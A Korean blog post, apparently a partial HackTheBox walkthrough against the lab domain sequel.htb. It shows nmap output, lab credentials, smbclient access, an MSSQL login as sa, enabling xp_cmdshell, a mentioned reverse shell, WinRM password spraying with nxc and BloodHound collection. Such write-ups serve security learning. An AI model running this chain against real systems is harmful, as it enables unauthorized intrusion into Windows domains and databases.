NMAP 수행
┌──(root㉿BOOK-2S4VUSLFM3)-[/home/surtesters]
└─# nmap 10.129.237.10 --min-rate=10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-22 21:29 KST
Nmap scan report for 10.129.237.10
Host is up (0.29s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
1433/tcp open ms-sql-s
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
Nmap done: 1 IP address (1 host up) scanned in 1.46 seconds
┌──(root㉿BOOK-2S4VUSLFM3)-[/home/surtesters]
└─# nmap -p 53,88,135,139,389,445,464,593,636,1433,3268,3269 -sCV 10.129.237.10 --min-rate=10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-22 21:31 KST
Nmap scan report for 10.129.237.10
Host is up (0.27s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-04-22 12:31:27Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
|_ssl-date: 2025-04-22T12:32:52+00:00; -1s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-04-22T12:32:52+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-info:
| 10.129.237.10:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| ms-sql-ntlm-info:
| 10.129.237.10:1433:
| Target_Name: SEQUEL
| NetBIOS_Domain_Name: SEQUEL
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: sequel.htb
| DNS_Computer_Name: DC01.sequel.htb
| DNS_Tree_Name: sequel.htb
|_ Product_Version: 10.0.17763
|_ssl-date: 2025-04-22T12:32:52+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-04-22T12:29:20
|_Not valid after: 2055-04-22T12:29:20
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
|_ssl-date: 2025-04-22T12:32:52+00:00; -1s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-04-22T12:32:52+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-04-22T12:32:16
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 98.82 seconds88 (kerberos) 오픈, 389(ldap db) 오픈 DC
이거 놓치면 망!
KxEPkKe6R8su
smbclient //sequel.htb/Accounting\ Department -U rose%KxEPkKe6R8su
accounts.xlsx 복구하기로 열었을 때, mssql 의 관리자계정이 존재
impacket-mssqlclient sa:'MSSQLP@ssw0rd!'@sequel.htb접속 후,
EXEC xp_cmdshell 'whoami'; 입력 시 turned off 되어 있음, xp_cmdshell enable 실행
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
reverse shell 연결 수행~!
해당 계정에서는 ryan user.txt 읽지 못함
일단 winpeas 실행 해보자! 유의미한 정보 얻지 못함!
mssql 설치 정보에서도 sql_svc 의 또다른 비밀번호 획득
WqSZAF6CysDQbGb3
획득 했었던 비밀번호들로 list 작성
nxc winrm 10.129.237.10 -u ryan -p passlist.txt
User 획득~!
블러드하운드 실행을 위해, 우리가 알고 있었던 dc01.sequel.htb hosts 파일 등록!
bloodhound-python -u ryan -p 'WqSZAF6CysDQbGb3' -d sequel.htb -dc DC01.sequel.htb -ns 10.129.237.10 -c All
해당 명령어 수행!
'Hacking > HackTheBox' 카테고리의 다른 글
| Timelapse (0) | 2025.06.03 |
|---|---|
| cicada (0) | 2025.04.09 |
| Sniper (0) | 2025.03.27 |
| Administrator (1) | 2024.11.26 |
| Certified (Windows · Medium) (0) | 2024.11.11 |
